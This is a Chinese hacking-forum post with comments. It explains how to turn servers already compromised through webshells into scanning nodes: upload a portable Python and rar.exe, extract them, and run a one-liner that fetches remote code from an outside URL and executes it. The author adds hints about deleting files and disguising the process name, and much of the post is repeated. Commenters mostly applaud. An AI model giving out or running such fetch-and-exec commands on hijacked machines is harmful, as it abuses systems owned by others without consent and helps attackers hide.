webshell的另一用途
话说过个新年,人也懒了,好久没发帖了,上来看看号是不是被封了。。。。
言归正传,不知道大家都用不用www.yascanner.com,旧版是www.bugscan.net。挂载各种插件,不过扫描要添加在线引擎节点。
你也可以自己电脑执行python -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())" 来上线。
我这里要说的是,各位手里闲着的webshell也不少吧,何不把它们派上场?当然有人要问了,你以为每台肉鸡都有Python了? 哈哈
好吧。这个问题我也困扰了半天,一度以为要来个自安装版或者什么t00ls专版by iframe呢。写了半天autoit了,才想起绿色版。
1.选个Python2.7.*的版本下载到本机执行安装,第一步选择Install just for me (not available on Windows Vista) (该步尤为重要!)
2.把一些帮助文档打钩去掉,能省就省。一顿next> finish。
3.把Python2.7文件夹打包,我这里选用winrar,因为体积很大,分卷压缩。4.选一个可写的角落,上传所有压缩包和winrar目录下的386K的rar.exe。
5.OK解压完了 开工。。。
等等,什么删除文件,更换一个有诱惑力的进程名,我这里就不多说了,当然肉鸡有python就更完美了。
webshell下让肉鸡执行IIS APPPOOL进程该起什么进程名,大家自己琢磨吧。
开扫
进程所属名问题,欢迎大家建议
听说上一篇文章作者抓鸡分分钟破百,不在话下,啧啧,这上线,这速度。
本文技术无任何含量,请勿拍砖。
言归正传,不知道大家都用不用www.yascanner.com,旧版是www.bugscan.net。挂载各种插件,不过扫描要添加在线引擎节点。
你也可以自己电脑执行python -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())" 来上线。
我这里要说的是,各位手里闲着的webshell也不少吧,何不把它们派上场?当然有人要问了,你以为每台肉鸡都有Python了? 哈哈
好吧。这个问题我也困扰了半天,一度以为要来个自安装版或者什么t00ls专版by iframe呢。写了半天autoit了,才想起绿色版。
1.选个Python2.7.*的版本下载到本机执行安装,第一步选择Install just for me (not available on Windows Vista) (该步尤为重要!)
2.把一些帮助文档打钩去掉,能省就省。一顿next> finish。
3.把Python2.7文件夹打包,我这里选用winrar,因为体积很大,分卷压缩。
rar a -m0 -v2m d:\py.rar c:\python2.7\*
5.
C:\temp\rar.exe x C:\temp\py.part01.rar c:\temp\
等等,什么删除文件,更换一个有诱惑力的进程名,我这里就不多说了,当然肉鸡有python就更完美了。
webshell下让肉鸡执行
c:\temp\python.exe -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())"
开扫
进程所属名问题,欢迎大家建议
听说上一篇文章作者抓鸡分分钟破百,不在话下,啧啧,这上线,这速度。
本文技术无任何含量,请勿拍砖。
评论28次
如果可以一键安装python环境 不需要任何设置 就方便了
py2exe
思路还可以。来试试看怎么样
不错 支持下
如果可以一键安装python环境 不需要任何设置 就方便了
想法不错。呵呵。
思路不错的说
思路不错,收藏了。。。
让肉鸡执行就是个问题
有点看不懂啊。貌似很高端的样纸。
其实可以自己搭建一个平台,控制肉鸡上线...
没看懂……
思路挺好的 分布式 扫描 这部署起来是挺方便的
思路赞一个
看着不很错
这是利用webshell作为自己的肉鸡帮助自己扫描吧。有点像分布式吧。似懂非懂。
表示不是很明白
不错的方法!
不错学xi了
怎么看回显结果?
网站登录
收藏了,不过这网站我打不开。。要上VPN才可以,难道被墙?
可以啊,改DNS为114.114.114.114